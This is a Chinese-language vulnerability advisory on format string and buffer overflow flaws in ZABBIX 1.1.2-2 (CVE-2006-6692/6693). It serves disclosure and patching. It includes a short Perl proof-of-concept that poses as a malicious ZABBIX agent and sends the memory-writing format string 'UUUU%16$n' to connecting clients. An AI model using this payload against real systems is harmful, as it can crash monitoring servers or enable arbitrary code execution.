安全研究

安全漏洞
ZABBIX格式串处理及缓冲区溢出漏洞

发布日期:2006-10-09
更新日期:2006-10-10

受影响系统:
ZABBIX SIA zabbix 1.1.2-2
不受影响系统:
ZABBIX SIA zabbix 1.1.2-4
描述:
CVE(CAN) ID: CVE-2006-6692,CVE-2006-6693

ZABBIX是用于监控网络参数及服务器状态的软件。

ZABBIX实现上存在多个格式串及缓冲区溢出漏洞,远程攻击者可能利用这些漏洞诱骗用户连接到恶意的ZABBIX代理导致拒绝服务或执行任意指令。

<*来源:Max Vozeler (max@hinterhof.net
        Ulf Harnhammar (ulfh@update.uu.se
  
  链接:http://secunia.com/advisories/22313/
        http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=391388
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl --

# zabbix-exploiter
# by Ulf Harnhammar in 2006
# I hereby place this program in the public domain.

use IO::Socket;
$server = IO::Socket::INET->new( Proto     => 'tcp',
                                 LocalPort => 10050,
                                 Listen    => SOMAXCONN,
                                 Reuse     => 1);
die "can't create server\n" if !$server;

while ($client = $server->accept())
{
  $client->autoflush(1);
  $key = <$client>; print $key;
  print $client 'UUUU%16$n'; # writes data to 0x55555555, at least on Debian testing
  # print $client '%n%n%n%n'; # crashes
  close $client;
}

建议:
厂商补丁:

ZABBIX SIA
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.zabbix.org/

浏览次数:3027
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障